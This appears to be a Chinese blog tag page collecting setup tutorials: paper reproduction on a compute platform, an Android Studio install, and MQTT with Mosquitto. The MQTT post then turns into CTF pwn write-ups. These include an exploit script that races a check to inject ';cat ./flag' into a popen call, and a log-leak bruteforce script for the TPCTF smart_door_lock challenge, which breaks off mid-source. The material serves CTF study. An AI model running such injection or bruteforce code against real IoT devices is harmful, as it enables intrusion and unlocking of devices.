标签 环境配置 下的文章

手把手教你进行论文复现,小白也能学会,赶紧收藏

复现,是你迈入“真科研”的第一步。
你是不是常常看见学术圈或技术论坛中大家提到“论文复现”这个词,却不太明白它的含义?
别急!这篇超详细的实操指南,从“是什么” 到 “怎么做”,再到 “避坑技巧”,手把手带小白走完第一次论文复现,赶紧收藏起来慢慢看~

什么是“复现”?

复现≠复制粘贴!它是用原作者公开的技术细节、实验步骤、代码仓库和数据集,自己动手重新实现,验证论文结果是否可重复的过程。
简单说,就是跟着论文的“说明书”,亲自跑一遍实验,既能吃透论文核心逻辑,又能练编程、调参技能,还能检验研究成果的可靠性,毕竟学术研究的本质就是“可验证、可推广”。

为什么要做论文复现?

1. 深入理解核心技术

复现的最大好处是能够从理论层面走向实践。光看论文中的理论、公式和结果可能无法完全理解其背后的实现细节,而亲自动手复现,可以让你更好地理解技术原理。

2. 检验研究成果的可靠性

论文中的研究结果,未必在其他环境下也能复现,尤其是涉及到数据集和模型训练等因素时。通过复现,我们可以验证这些结果是否具有普适性。

3. 累积实战经验

复现过程是一个实战的过程,尤其是在深度学习和机器学习、大模型领域,实验中的调参、数据处理、模型选择等都会是你宝贵的经验。对科研人员来说,复现一些经典论文是最直接的学习方式。

手把手教你做第一个复现项目

复现论文并不是一件容易的事,但只要你掌握了方法,逐步进行,也能顺利完成。接下来我们以《PhotoDoodle: Learning Artistic Image Editing from Few-Shot Examples》这篇论文为例,借助大模型实验室Lab4AI平台,带你从头开始复现

Step 1 找到合适的论文和代码

复现的第一步是找到值得复现且能复现的论文和代码。大多数论文会将其代码发布在GitHub或其他平台上,因此你需要阅读论文,并且找到代码仓库的链接,链接通常附加在论文末尾或摘要部分。找到论文提供的GitHub开源代码后,你需要查看项目中是否有清晰的README文件,介绍如何配置环境、安装依赖、运行代码等。

这里分享5个筛选项目的关键技巧,总结为“三查”核心原则:查信息完整性、查代码一致性、查资源可行性,帮你快速避坑:

  • 完整信息性:优先选择开源项目,尤其是原作者主动公开代码仓库、数据集,这种项目复现难度较低。同时,选择项目时优先关注项目活跃度、检查Star数、Fork数、更新频率、issue解决率等。一般情况下数值越高,说明社区认可度高、维护更及时,遇到问题更容易找到解决方案;
  • 代码一致性:检查代码和论文的实现是否一致。如果有问题,可以参考GitHub上的Issues查看是否有人遇到类似问题。
  • 资源可行性:检查项目是否提供完整依赖清单、数据集及模型下载链接。如果作者未提供,你可能需要额外花费大量时间寻找适配资源。


在《PhotoDoodle》这篇论文中,GitHub上的代码仓库包含了与艺术图像编辑相关的实现,README有详细的项目介绍,包括了从少量样本中学习艺术风格的代码。需要重点关注以下几个部分:

  • 项目概述:了解这篇论文的核心思想,确认复现的目标。
  • 环境配置:确认环境依赖是否满足你的系统,查看Python、CUDA和其他必需库的版本。
  • 训练与推理代码:观察代码是否完整,并分析如何通过代码进行图像编辑任务,特别是如何加载预训练模型、微调模型、以及如何用少量图像进行训练。

Step 2 配置环境并安装依赖

本次我们选用大模型实验室Lab4AI来进行复现,平台提供灵活计费的H卡算力,闲时使用更优惠。您也可以使用本地资源或者实验室资源,进行本次复现

打开大模型实验室Lab4AI,登录大模型实验室Lab4AI平台。点击右侧“新建实例”,新建前建议先查看“GitHub项目的文档”的环境配置说明。

Step 3 下载代码

新建实例后,先下载论文代码,推荐4种常用方式:

  • 第一种:通过HTTPS方式。通过网页URL链接克隆,无需额外配置密钥,是最常用的方式;
  • 第二种:通过SSH方式。通过SSH密钥认证克隆,需通过SSH密钥认证克隆提前在GitHub账号绑定本地SSH密钥,更安全且无需重复输入密码;
  • 第三种:通过GitHub CLI方式。通过GitHub官方命令行工具克隆,需先安装并登录该工具,适合习惯命令行操作的用户;
  • 第四种:直接下载项目压缩包,不需要Git工具即可获取代码。

Step 4 配置环境

环境配置是复现的“重头戏”,按以下步骤操作,少踩 90% 的坑:

(1) 创建独立虚拟环境,这样能够避免依赖冲突:

conda create -n doodle python=3.11.10
# 创建环境

conda activate doodle
# 激活环境

(2) 安装PyTorch与项目依赖

使用 cd 命令进入代码所在文件夹,再分两步安装。根据GitHub说明,通过pip安装所需的PyTorch及所有依赖。如果网络环境受限,可以选择国内的镜像源(如清华镜像)来加速下载:

pip install torch==2.5.1 torchvision==0.20.1 torchaudio==2.5.1 --index-url https://download.pytorch.org/whl/cu124
pip install --upgrade -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

Step 5 执行推理

由于这个项目的README.md文件先介绍的如何推理,再介绍了如何训练。所以,我们先执行推理,看一下推理效果。

(1) 准备工作:

① 由于CPU无法满足推理算力需求,所以需要重启Lab4AI实例并选择1卡GPU;

②在终端执行conda activate doodle激活之前创建的Conda 环境,再通过cd 路径命令进入 PhotoDoodle 代码目录。

(2) 运行推理代码:

python inference.py

(3) 常见问题解决:

运行代码时出现一些依赖冲突与缺失的问题

  • “安装的 diffusers 版本过低”
  • huggingface-hub 版本过高,与其他不兼容”
  • “缺少PEFT库”
  • “安装的PEFT库版本过高与transformers库的版本不兼容”
    等等……


遇到这些问题时,最好的方法是参考项目文档中提供的建议,查看GitHub Issues寻找解决方案,您也可以询问AI大模型寻找解决办法。

(4)自定义输出:

修改inference.py中的输入图像路径、编辑提示词等参数,重新运行可以看到获得不同的输出结果。

Step 6 执行推理下载数据集和训练模型

训练数据集与预训练模型是多数论文复现项目的基础支撑。《PhotoDoodle》项目的数据集及预训练模型的下载链接,都能在项目 GitHub 仓库的 README 文件中找到。

在下载数据和预训练模型时,出现了多次因为网络问题而无法下载数据和模型的情况。核心原因可归为四类:

  • 第一:跨境网络限制。模型或数据多存于HuggingFace、GitHub、GoogleDrive等境外站点,国内直连易被限流、阻断。
  • 第二:源站或链路问题。源站限速、链接失效、CDN节点故障,或下载高峰导致服务器拥堵都可能导致网络问题。
  • 第三:本地配置问题。代理或梯子配置错误、防火墙拦截、下载工具无断点续传(大文件易断连),或本地带宽或网络稳定性差。
  • 第四:权限或合规限制。部分数据集或模型需授权访问,或源站设地域或IP限流,未满足则被拒绝连接。

遇到网络问题时,您可以使用可靠的下载工具或者科学上网。

Step 7 执行训练

(1) 按论文提供的脚本执行

一旦完成了环境配置和数据准备,接下来的步骤就是开始训练。执行训练代码时,我们依据GitHub项目中给出的命令执行。

(2)个性化训练

您也可以做一些个性化训练,按data 文件夹的格式组织自己的数据集,修改脚本中的参数即可实现自定义训练。

复现高频问题及解决方案

总结一下此次复现环节踩的坑以及对应的解决方法。

小贴士:复现时一定要记笔记!把遇到的问题、解决方案、参数调整记录下来,下次复现能少走很多弯路~

案论文复现总结

论文复现的环境配置是一项系统性的工作。对新手而言,关键要抓住三个核心:

  • 前期筛选:用“三查”原则,查信息完整性、查代码一致性、查资源可行性。选择合适的开源项目,避开半开源、信息缺失的项目;
  • 环境配置:借助大模型实验室Lab4AI平台的预配置环境和独立虚拟环境,锁定依赖版本,按“安装 - 验证 - 调整”的步骤逐步推进,避免版本冲突;
  • 问题解决:遇到网络、依赖、配置问题时,按“定位原因 - 查找适配方案 - 验证效果”的逻辑处理,善用社区 issue、官方文档、镜像源工具和AI大模型工具。

每一次成功的环境配置,都是对你工程解决问题能力的一次极好锻炼。希望这份详细指南能帮你避开弯路,顺利开启论文复现之旅。

Lab4AI大模型实验室,能为你提供一键复现方案,有效规避论文复现中的各类坑!

平台实现算力与实践场景的无缝衔接,配备充足 H 卡算力,支持模型复现、训练、推理全流程,更具备灵活弹性、按需计费、低价高效的优势,完美解决缺高端算力、算力成本高的核心痛点。

祝你复现顺利!

GitLink开源创新服务平台与Lab4AI大模型实验室联合发起「论文头号玩家」论文复现计划。寻找百万「论文头号玩家」计划 | 首批复现体验官开放申请,最高可获500元算力金!本计划开放高性能H800 GPU算力,旨在降低复现门槛,推动学术成果的实践转化。
<div align="center">
参与活动您将获得:
</div>
<p align="center">
<img src="http://llamafactory-online-assets.oss-cn-beijing.aliyuncs.com/lmlab/docs/v1.0/blog/synchronize/jy_fuxian-15.png">
</p>

Android studio安装教程 保姆级教程

如果想要彻底重装Android studio可以删除
目录C:\Users\用户名
中的以下几个文件夹。
.android
.gradle
.Android studio(Android studio 4.0版本之前才有)

隐藏文件夹(Android studio 4.0版本后才有)
C:\Users\用户名\AppData\Roaming\Google\AndroidStudio4.2
C:\Users\用户名\AppData\Local\Google\AndroidStudio4.2
比如:

**安装Win 11 环境下 Android Studio Iguana | 2023.2.1
版本为例。(部分截图为旧版本不影响使用)**

下载地址: https://pan.quark.cn/s/d557657e15a6

首先下载Android studio安装包

趁下载的时间,我们进入电脑的一个盘跟目录下面,创建我们Android
studio的安装目录,sdk的目录,项目的存放目录,方便我们日后查找

这里我们创建的是AndroidTool目录,创建如上图所示五个子目录。

AndroidStudio 存放Android studio的软件程序的地方,也就是Android

studio的安装目录
AndroidSDK 存放SDK的地方,包含adb工具等
AndroidProject 存放我们写的Android
项目代码,建议把我们所有的源代码放在此目录下方便日后查找
AndroidDrive 可选
用来存放我们虚拟机的地方,设置方法参考本文末尾,非必须。默认在C盘下存放。
AndroidGradle 可选
用来存放gradle缓存依赖的地方,非必须。默认在C盘下存放。

下载完成后运行文件,进入如下界面

点击next

点击next

选择对应的Android studio安装目录,这里我们选择我们一开始创建好的Android
studio目录即可。然后继续点击next

点击install

等待安装完成!

安装成功后会在开始菜单存在Android Studio的启动图标,点击即可启动Android
studio。

安装成功点击finish,等待启动。

随便点击一个,发不发送报告都行。

注:以下截图为旧版本截图,不过不影响使用。

进入熟悉的画面

询问我们是否有配置文件导入,这里直接选择不导入,点ok
等待文件下载。

进度条走完后出现弹窗【无法访问sdk】,先点击cancel。

再点击next

选择安装类型,这里我们自定义,第二个,点击next

设置我们的jdk目录,可以默认的,也可以自定。这里我们选择默认即可。

选择风格,黑暗模式

设置sdk目录,这里选择我们一开头创建的AndroidSDK目录。(Android Virtual
Device 无法勾选可以先跳过直接点击next)点击next

设置虚拟机相关的配置,根据电脑配置自行拉取,这里我们默认。

确认配置信息,点击next。

确认所有选项,都点击了accept,然后点击Finish。
等待下载完成。

等待下载安装完成。

下载安装完成,点击finish。

下面开始创建hello word项目,点击 new project

注:这里Empty Activity与Empty Views
Activity的区别是主要是UI框架的不同。
Empty Activity:为谷歌新推出的Jetpack
Compose声明式UI框架,主要的开发语言为kotlin,不支持java
Empty Views Activity:为Android
传统的View控件布局的项目模板,支持kotlin和java。
初学者一般建议采用Empty Views Activity进行入门学习。

选择empty activity模板,点击next

设置项目名称,包名,路径(路径选择我们一开始创建的AndroidProject目录,注意加项目名称,尽量不要有中文),选择语言(java或kotlin都可以),选择最低支持的Android
版本,这里选择6.0,点击finish。

等待下载内容的完成。

点击finish。

等待项目构建完成
这里由于是第一次启动,所以需要下载gradle以及Android项目需要引用的包,视网络好坏程度决定等待时间长短

点击绿色三角形位置,运行项目。

等待项目构建完成。

成功显示Hello World!。
到这里就安装成功啦。

常见问题:

1.在安装Android Studio
的过程中进行到设置SDK目录这一环节时,可能出现以下的情况,无法勾选需要安装的选项,导致后续步骤出现以下情况。

可以尝试修改电脑的系统时间为美国太平洋时间,然后删除文章前面所述的相关文件,重新打开Android
Studio配置一遍即可。

初学者进阶操作:

1. 下载sdk工具(可选)

从file->setting打开下面界面

这里是下载Android 版本,和sdk构建工具的地方。
一般我们只需要下载我们需要的版本和对应的工具,当然也可以全量下载,全量的话估测大概需要500G的硬盘空间。
这里演示下载最新的Android版本和构建工具。

勾选对应的版本

勾选对应的版本

点击ok。如果出现同意协议的界面,则全部点击accept,然后点击next

等待下载完成。

点击finish

这里已经下载成功了

2. ANDROID_EMULATOR_HOME 虚拟机环境变量(可选)

自从学了Android,C盘天天爆红怎么办?C盘一查,C:\Users\用户.android这个文件占了10+GB。怎么办?
这时候可以创建ANDROID_EMULATOR_HOME环境变量。对于Android studio
4.3已下的用户则需要设置ANDROID_SDK_HOME。
这里我们简单演示已下,如何配置环境变量到我们的目录。

如果不设置环境变量,开发者创建的虚拟设备默认保存在
C:\ Users \用户.android目录下;
如果设置了ANDROID_EMULATOR_HOME环境变量,那么虚拟设备就会保存在%ANDROID_EMULATOR_HOME%/.android路径下。
这里有一点非常容易混淆的地方,此处的%ANDROID_EMULATOR_HOME%环境变量并不是Android
SDK的安装目录。

3. Gradle 位置变更(可选)

C:\Users\用户.gradle也是也非常容易变成非常大的文件夹,这个可以直接在Android
studio进行改动

直接选择相应的路径即可。

MQTT讲解

MQTT(Message Queuing Telemetry Transport,消息队列遥测传输协议),是一种基于发布/订阅(publish/subscribe)模式的“轻量级”通讯协议,该协议构建于TCP/IP协议上,由IBM在1999年发布。

MQTT最大优点在于,用极少的代码和有限的带宽,为连接远程设备提供实时可靠的消息服务。

作为一种低开销、低带宽占用的即时通讯协议,使其在物联网、小型设备、移动应用等方面有较广泛的应用。

协议原理

实现MQTT协议需要客户端和服务器端通讯完成,在通讯过程中,MQTT协议中有三种身份:发布者(Publish)、代理(Broker)(服务器)、订阅者(Subscribe)。其中,消息的发布者和订阅者都是客户端,消息代理是服务器,消息发布者可以同时是订阅者。

MQTT传输的消息分为:主题(Topic)和负载(payload)两部分:

(1)Topic,可以理解为消息的类型,订阅者订阅(Subscribe)后,就会收到该主题的消息内容(payload);
(2)payload,可以理解为消息的内容,是指订阅者具体要使用的内容。

发布者 (Publisher)

功能: 负责产生数据和消息,并将这些指定topic的消息发送(发布/Publish)到 Broker。

代理/服务器(broker)

可以理解为提供 mqtt 服务的代理服务器 ,通俗一点来讲就是”邮局”或者说是”消息中转中心”,每个 client 之间的通信都必须通过 Broker 来进行。
简单来说,Broker就是一个中间人,负责管理所有客户端的连接,并确保消息能够从一个客户端安全、高效地传递到另一个或多个客户端。

订阅者(Subscribe)

功能: 负责接收它感兴趣的消息。它会提前告诉Broker它对哪个”主题”(Topic)的消息感兴趣(这个行为叫做订阅/Subscribe),就会接收订阅相同topic的client。

客户端Client

客户端可以充当发布者,也可以充当订阅者,也可以同时充当两个角色

Client 是指任何连接到 Broker 的设备或应用程序 ,可以理解为”寄信人”和”收信人”。在物联网场景中,一个 Client 可以是一个温度传感器、一个智能灯泡、一部手机上的App,或者是一个在服务器上运行的数据分析程序。

示意图

client1,2,3,4同时连接broker,client1,2,3订阅topic"diag" ,这时client4发送topic为"diag" msg="hello"给broker,broker会向同时订阅topic="diag"的client1,2,3发送这个消息

image.png

环境配置

1.使用安装 Mosquitto MQTT

sudo apt update
sudo apt install mosquitto mosquitto-clients

2.启动服务并设置开机自启

sudo systemctl enable mosquitto
sudo systemctl start mosquitto

3.配置conf

sudo vim /etc/mosquitto/mosquitto.conf

在文件中添加

listener 1883 #设置监听端口为 1883
allow_anonymous true  # 可选,允许匿名访问(默认)

摁“Esc”+“:wq”退出后终端输入

sudo systemctl restart mosquitto # 重启服务

image.png

netstat -lnvp查看一下,可以看到1883端口已经开始监听

image.png

下载mqttx

MQTTX Download

image.png

点击新建连接,我这里是wsl启动的,但是监听了所有ip的端口,所以ip直接填0.0.0.0

image.png

添加一个订阅

image.png

利用终端进行连接测试

终端输入

mosquitto_pub -h localhost -t testtopic -m "Hello MQTT"

可以看到在客户端已经收到了消息

image.png

终端输入

mosquitto_sub -h localhost -t testtopic

用来订阅这个消息,在客户端输入主题testtopic

image.png
发送之后,在客户端和终端界面均可以看到刚才发的消息

image.png

python使用mqtt

pip install paho-mqtt

发送端

# -*- coding: utf-8 -*-# -*- coding: utf-8 -*-

import paho.mqtt.client as mqtt
import time

def on_connect(client, userdata, flags, rc):
print("链接")
print("Connected with result code: " + str(rc))

def on_message(client, userdata, msg):
print("消息内容")
print(msg.topic + " " + str(msg.payload))

#   订阅回调
def on_subscribe(client, userdata, mid, granted_qos):
print("订阅")
print("On Subscribed: qos = %d" % granted_qos)
pass

#   取消订阅回调
def on_unsubscribe(client, userdata, mid, granted_qos):
print("取消订阅")
print("On unSubscribed: qos = %d" % granted_qos)
pass

#   发布消息回调
def on_publish(client, userdata, mid):
print("发布消息")
print("On onPublish: qos = %d" % mid)
pass

#   断开链接回调
def on_disconnect(client, userdata, rc):
print("断开链接")
print("Unexpected disconnection rc = " + str(rc))
pass

client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.on_publish = on_publish
client.on_disconnect = on_disconnect
client.on_unsubscribe = on_unsubscribe
client.on_subscribe = on_subscribe
client.connect('127.0.0.1', 1883, 600)  # 600为keepalive的时间间隔
while True:
client.publish(topic='testtopic', payload='amazing', qos=0, retain=False)
time.sleep(2)

image.png

image.png

接收端

# -*- coding: utf-8 -*-# -*- coding: utf-8 -*-

import paho.mqtt.client as mqtt
import time

def on_connect(client, userdata, flags, rc):
print("链接")
print("Connected with result code: " + str(rc))

def on_message(client, userdata, msg):
print("消息内容")
print(msg.topic + " " + str(msg.payload))

#   订阅回调
def on_subscribe(client, userdata, mid, granted_qos):
print("订阅")
print("On Subscribed: qos = %d" % granted_qos)
pass

#   取消订阅回调
def on_unsubscribe(client, userdata, mid, granted_qos):
print("取消订阅")
print("On unSubscribed: qos = %d" % granted_qos)
pass

#   发布消息回调
def on_publish(client, userdata, mid):
print("发布消息")
print("On onPublish: id = %d" % mid)
pass

#   断开链接回调
def on_disconnect(client, userdata, rc):
print("断开链接")
print("Unexpected disconnection rc = " + str(rc))
pass

client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.on_publish = on_publish
client.on_disconnect = on_disconnect
client.on_unsubscribe = on_unsubscribe
client.on_subscribe = on_subscribe
client.connect('127.0.0.1', 1883, 600)  # 600为keepalive的时间间隔

client.subscribe('testtopic', qos=0)

client.loop_forever() # 保持连接

image.png

image.png

例题讲解

CISCN2025——final mqtt

题目分析

image.png

image.png

程序首先会读取两个文件,如果文件不存在则直接退出

所以首先需要创建两个文件

image.png

接着会创建一个mqtt客户端,但是这里要求broker的监听端口是9999,所以我们需要改一下端口,修改方式上文说过

image.png
成功启动服务

image.png

首先程序会在订阅的diag主题中接受auth,cmd,arg三个参数,而且arg参数存放在bss段上

image.png

在start_routine函数中,会首先进行一个认证

image.png

认证的逻辑就是将接收到的VIN码转成十六进制(其实就是在考察mqtt接受数据),不多赘述了

随后根据cmd值,可以调用set_vin命令

image.png

这里有一个很明显的命令注入,src就是我们刚才的arg参数

popen函数会执行s的命令,由于是“r”参数,所以他会将命令执行的结果传入管道,在fread的时候读到ptr+5的位置,然后利用mqttsend函数发送给broker

image.png

但是执行命令之前,会有一个check函数,这个函数不细看了,功能就是只允许命令中有数字或字母出现,这就导致命令注入无法输入符号而不成功

但是由于检查完之后到执行命令之前,子进程会执行一个sleep(2)的函数,于是在这个期间我们就可以再次发送消息,修改arg为命令注入的参数,这当然绕不过check的检查,但是在上一个子进程休眠两秒结束后,我们的命令已经被修改了,于是就可以执行命令注入了

exp

#! /usr/bin/python3
import random
from pwn import *
import time
import paho.mqtt.client as mqtt
import json
context(log_level = "debug",os = "linux",arch = "amd64")
pwnFile = "./pwn"
libcFile = "./libc.so.6"
ip = "127.0.0.1"
local = ""
local_port = 9999
port = 9999
elf = ELF(pwnFile)
libc = ELF(libcFile)

def publish(client,topic,auth,cmd,arg):
msg = {
"auth":auth,
"cmd":cmd,
"arg":arg
}
result = client.publish(topic = topic, payload = json.dumps(msg))
print(json.dumps(msg))
print(result)
return result

def on_connect(client, userdata, flags, rc):
client.subscribe("vehicle_diag")
client.subscribe("diag")
client.subscribe("#")  # 订阅所有
client.subscribe("diag/resp")
print("Connected with result code " + str(rc))

def on_subscribe(client,userdata,mid,granted_qos):
print("消息发送成功")

def on_message(client, userdata, msg):
message = msg.payload.decode()# Decode message payload
print(f"Received message on topic '{msg.topic}': {message}")
# try:
#     data = json.loads(message)  # 解析为字典
#     dest = data.get("vin")  # 获取vin字段
#     log.success("dest -> "+ dest)
# except json.JSONDecodeError:
#     print("JSON解析失败")
print(message)

def sum2hex(dest):
v3 = 0
for i in range(len(dest)):
v3 = (0x1f  * v3 +  ord(dest[i])) & 0xffffffff
log.success(f"sum2hex -> {v3:08x}")
return  f"{v3:08x}"

#gdb.attach(io,'b *$rebase(0x1EC0)')
topic = "diag"
client = mqtt.Client()

client.on_connect = on_connect
client.on_message = on_message
client.on_subscribe = on_subscribe
client.connect(host = "127.0.0.1",port = 9999,keepalive=10000)

auth = sum2hex("hahaha\n")#这里是你自己接收到的VIN码

publish(client,"diag",auth,"set_vin","111111111111")
sleep(0.5)
publish(client,"diag",auth,"set_vin",";cat ./flag")
publish(client,"diag",auth,"set_vin",";cat ./flag")
sleep(1)

client.loop_start()

打通截图

image.png

TPCTF——smart_door_lock

题目已开源TPCTF2025/pwn-smart-door-lock at main · tp-ctf/TPCTF2025 · GitHub

题目附件是抹了符号表的静态编译,总之如果让我来直接逆向这个程序,我能逆一年,所以仅从复现学习的角度,我们先来学习源码,在对应到IDA里逆向吧,不得不说抹了符号表确实给这个题增加了太多难度

本题exp学习自TPCTF 2025 Writeup by Nepnep

源码学习

main.cpp

image.png

main.cpp里核心就是调用了mqtt_lock这个函数,其他的都不重要,都是初始化和结束回收资源函数等等,我们不多关注了

door_lock.h

image.png

这里面首先定义了指纹结构体和门锁开关状态结构体,指纹结构体包含指纹信息,下一个指针(很明显是个链表),指纹的id和重试次数,门锁状态定义了开/关两种状态以及操作的时间戳。

image.png

其次定义了mqtt_lock函数(核心),以及其他一些mqtt回调函数,还有指纹链表(finger_list),以及本题的关键——logger这个文件,还有其他若干函数和参数,不多解释了,接下来的函数分析会提到

door_lock.cpp

image.png

这是一个处理json数据的辅助函数,在这个题中不涉及漏洞和核心逻辑,不多分析了

贴AI的解释

image.png

时间戳,不多说

image.png

大白话就是把输入的字符串形式的指纹数据提取成int数组

image.png

这里限制了指纹数据只能是数字,如果是其他的,比如字母,就会直接返回空指针,这里比较重要,后面要考,划重点

mqtt_lock::mqtt_lock(const char *id, const char *host, int port) : mosqpp::mosquittopp(id)
{
/* set connection */
int keepalive = 60;
tls_opts_set(1,"tlsv1",NULL);
tls_set("/etc/mosquitto/certs/ca.crt",NULL,NULL,NULL,NULL);
tls_insecure_set(true);
connect(host, port, keepalive);

/* inital session & token */
session_id = NULL;
auth_token = NULL;

/* set lock inital */
lock_door();
/* open logger create read write */
strcpy(log_file,"/etc/mosquitto/smart_lock.log");
logger = fopen(log_file, "w+");
if (logger == NULL) {
printf("Error opening file!\n");
exit(1);
}
int status = log("logger created:%s\n",log_file);

/* read fingers */
FILE* finger_file = fopen("/etc/mosquitto/fingers_credit","r");
if (finger_file == NULL) {
printf("Error opening file!\n");
exit(1);
}
char line[512];
fingers *finger_pos = NULL;
max_finger_id = 1;
while (fgets(line, sizeof(line), finger_file)) {
line[strcspn(line, "\n")] = 0;
struct fingers *new_finger = (struct fingers*)malloc(sizeof(struct fingers));
new_finger->finger_id = max_finger_id++;
new_finger->next = NULL;
new_finger->retry_count = 0;

if (new_finger == NULL) {
log("Error allocating memory!\n");
exit(1);
}
if (finger_list == NULL)
{
finger_list = new_finger;
finger_pos = new_finger;
} else {
finger_pos->next = new_finger;
finger_pos = new_finger;
}
if( edit_finger(new_finger,(char*)line)){
continue;
}
else {
free(new_finger);
continue;
}
}
fclose(finger_file);

/* inital subscribe*/
subscribe(NULL, "auth_token");
subscribe(NULL, "manager");
subscribe(NULL, "logger");
};

敲重点了!

image.png

首先初始化tls证书,session_id,auth_token,和mqtt的服务器(broker)进行连接

image.png

其次设置门锁状态为锁门,同时打开日志文件

这里初始化了logger(FILE类型),最终这个指针会存放在堆上,而本题的堆地址是固定值

为什么?

image.png

这是qemu虚拟机的结果

image.png

懂了吗?

image.png

这是我wsl的结果,所以这个系统ALSR随机化保护开的比较低,堆地址是固定的

image.png

接着从/etc/mosquitto/fingers_credit读出一个指纹数据(实则是长度为20的int数组),然后再程序中初始化一下指纹链表

image.png

image.png

最后订阅了这三个主题

image.png

mqtt_lock的析构函数

image.png

add函数,对应的堆题中的增函数,是一个比较经典的链表增添堆块类型,有个很明显的uaf,如果edit失败,new_finger这个指针会被free但是还在指针链表中

image.png

edit函数,format_finger为空指针,就会返回false,而这里根据前面对change_finger_format函数的分析,只要指纹数据里有字母,就会edit失败

由此可以利用uaf漏洞

image.png

remove操作,对应堆题中的删函数,操作没有什么漏洞

image.png

check_finger函数,这里会计算指纹的相似度,然后存放到日志中,后面有可以读取日志的操作,所以存在信息泄露,由此我们可以猜测出远端的指纹信息,具体exp如下

import paho.mqtt.client as mqtt
from time import sleep
import ssl
import re
import time
import random

# MQTT Broker Configuration
BROKER = "127.0.0.1"
PORT = 8883
CAFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/ca.crt"
CERTFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.crt"
KEYFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.key"
YELLOW = "\033[93m"
BLUE = "\033[94m"
END = "\033[0m"
auth_token_topic = "auth_token"
valid_token_topic = "validtoken123123"
logfile_topic = "logfile"
logger_topic = "logger"

fingerprint_array = [0] * 20  # 初始化数组,包含20个0

def extract_similarity_from_eof(log_messages):
"""从日志列表中提取 EOF 上一行的相似度百分比。"""
if len(log_messages) < 2:
return None
eof_index = len(log_messages) - 1
second_last_message = log_messages[eof_index - 1]
match = re.search(r"finger similarity:%([\d\.]+)", second_last_message)
return float(match.group(1)) if match else None

def on_message(client, userdata, msg):
"""回调函数,用于处理接收到的消息。"""
userdata.append(msg.payload.decode())

def perform_bruteforce():
results = []

# 设置订阅者以监听日志
print("[DEBUG] Setting up MQTT client for subscription...")
client = mqtt.Client(userdata=results)
client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE, cert_reqs=ssl.CERT_NONE)
client.tls_insecure_set(True)
client.on_message = on_message

client.connect(BROKER, PORT, 60)
client.subscribe(logfile_topic)
client.loop_start()

# 验证 Token
print("[DEBUG] Publishing authentication token...")
client.publish(auth_token_topic, "validtoken123123")
time.sleep(2)
fingerprint_array = [0] * 20
random_array = [0] * 20
for i in range(20):
print(f"[DEBUG] Starting binary search for index {i}...")
left, right = 1, 2 ** 31 - 1  # 设置最大值为 2^31 - 1
while True:  # 修改为基于相似度的条件
random_array[i] = random.randint(left, right)  # 随机选择一个值
real_array = fingerprint_array.copy()
payload = f"[{','.join(map(str, random_array))}]"
print(f"[DEBUG] Publishing guess for index {i}: {payload}")
client.publish(valid_token_topic, payload)
time.sleep(0.5)

# 请求日志
print(f"[DEBUG] Requesting log data...")
client.publish(logger_topic, "download")
time.sleep(0.5)

# 等待相似度响应
if len(results) >= 2:  # 确保有足够的消息提取 EOF 上一行
similarity = extract_similarity_from_eof(results)
print(f"[DEBUG] Extracted similarity: {YELLOW}{random_array[i]}{END} : {BLUE}{similarity}{END}")

if similarity is None:
print("[DEBUG] No similarity data found, retrying...")
continue
P = similarity * 20 / 100
x1 = int(P * random_array[i])
x2 = int(random_array[i] // P)
# 两个分别发送一下看看比例
print(x1, x2)
real_array[i] = x1
client.publish(valid_token_topic, f"[{','.join(map(str, real_array))}]")
print(f"[DEBUG] Publishing guess for index {i}: {real_array}")
client.publish(logger_topic, "download")
sleep(1)
similarity1 = extract_similarity_from_eof(results)
print(f"[DEBUG] Extracted similarity: x1:{YELLOW}{x1}{END} : {BLUE}{similarity1}{END}")
real_array[i] = x2
client.publish(valid_token_topic, f"[{','.join(map(str, real_array))}]")
print(f"[DEBUG] Publishing guess for index {i}: {real_array}")
client.publish(logger_topic, "download")
sleep(1)
similarity2 = extract_similarity_from_eof(results)
print(f"[DEBUG] Extracted similarity: x2:{YELLOW}{x2}{END} : {BLUE}{similarity2}{END}")
if similarity1 > similarity2:
fingerprint_array[i] = x1
similarity = similarity1
else:
fingerprint_array[i] = x2
similarity = similarity2
random_array[i] = 0

if similarity >= 4.75 * (i + 1):
print(f"[DEBUG] Target similarity reached: {similarity} >= {4.75 * (i + 1)}")
break  # 达到目标相似度时结束循环

client.loop_stop()
client.disconnect()

print("Final fingerprint array:", fingerprint_array)
# fingerprint_array的逗号之间不要有空格
print("Final fingerprint array:", ','.join(map(str, fingerprint_array)), end="\n")

if __name__ == "__main__":
perform_bruteforce()

原理如下:

第一次我对第一位随机发送一个数,其余全是0,程序会计算出相似度,记为S,相似比为P(min(随机数Random,真实指纹数据Real)/max(随机数Random,真实指纹数据Real))则S=(P/20)*100,由于S可以泄露,则P=(S/100)*20,则一定有Real/Random=P或者Random/Real=P,即Real=P*Random或Real=Random/P

image.png

对应这段代码

然后我们把计算出来的两个可能真实值都发一遍,看看哪个相似度更高,哪个就是真实值

image.png

最后我们还要保证总相似度达到90%,保险起见,这里设置的阈值是95%=4.75%*20

image.png

日志写入函数,不多说了

image.png

download函数,其实就是堆题中的show函数,也就是这里可以泄露日志,clear函数,就是重新打开一遍日志文件,相当于把之前的清空了

image.png

开关门函数,其实就设置了一个状态,没什么用

void mqtt_lock::on_message(const struct mosquitto_message *message)
{

if(!strcmp(message->topic, "auth_token")){
if (auth_token) {
unsubscribe(NULL, auth_token);
// log("close subncribe:%s\n",auth_token);
free(auth_token);
}
auth_token = (char*)malloc(0x11);
char * payload = (char*)message->payload;
for (int i = 0; i<0x10;i++) {
if ((payload[i] <= '9' && payload[i] >= '0') || (payload[i] <= 'Z' && payload[i] >= 'A') || (payload[i] <= 'z' && payload[i] >= 'a')) {
auth_token[i] = payload[i];
} else {
log("auth_token error: token must be num or letter\n");
free(auth_token);
auth_token = NULL;
return;
}
}
auth_token[0x10] = 0;
log("auth_token:%s\n",auth_token);
char re_auth_token[20];
snprintf(re_auth_token, 20, "re_%s", auth_token);

subscribe(NULL, auth_token);

publish(NULL, re_auth_token, 11, "finger tap\n");
// log("open subncribe:%s\n",auth_token);

return;

}
else if(!strcmp(message->topic, "manager")) {
/*
{
"session": "a1b2c3d4e5",
